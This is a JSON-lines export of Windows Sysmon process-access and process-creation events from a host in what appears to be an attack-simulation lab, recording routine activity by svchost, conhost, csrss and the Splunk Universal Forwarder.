{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2167-5F25-0000-001053850900}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2167-5F25-0000-001053850900}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6218,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.507\r\nSourceProcessGUID: {41C8662E-2167-5F25-0000-001053850900}\r\nSourceProcessId: 1476\r\nSourceThreadId: 3900\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.507","SourceProcessGUID":"{41C8662E-2167-5F25-0000-001053850900}","SourceProcessId":"1476","SourceThreadId":"3900","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.054\r\nProcessGuid: {41C8662E-2168-5F25-0000-00101D870900}\r\nProcessId: 880\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.054","ProcessGuid":"{41C8662E-2168-5F25-0000-00101D870900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2168-5F25-0000-00101D870900}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2168-5F25-0000-00101D870900}","TargetProcessId":"880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2168-5F25-0000-00101D870900}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2168-5F25-0000-00101D870900}","TargetProcessId":"880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
